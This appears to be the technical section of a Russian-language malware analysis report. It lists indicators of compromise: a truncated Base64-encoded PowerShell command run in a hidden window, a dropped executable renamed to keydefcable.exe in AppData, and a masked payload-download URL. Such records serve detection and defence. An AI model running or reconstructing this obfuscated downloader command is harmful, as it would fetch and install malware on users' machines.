Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAG4AdABlAHIAYQBjAHQAaQBvAG4AcwB2AGIAdgA9ACcAcgBlAHAAdQByAHAAbwBzAGUAYwBsAGMAJwA7ACQAYwBvAHAAeQB...
- %HOMEPATH%\620.exe
- %HOMEPATH%\620.exe в <LS_APPDATA>\keydefcable\keydefcable.exe
- http://hu##uwl.com/wp-content/x9/
- '%HOMEPATH%\620.exe'
- '<LS_APPDATA>\keydefcable\keydefcable.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAG4AdABlAHIAYQBjAHQAaQBvAG4AcwB2AGIAdgA9ACcAcgBlAHAAdQByAHAAbwBzAGUAYwBsAGMAJwA7ACQAYwBvAHAAeQB...' (со скрытым окном)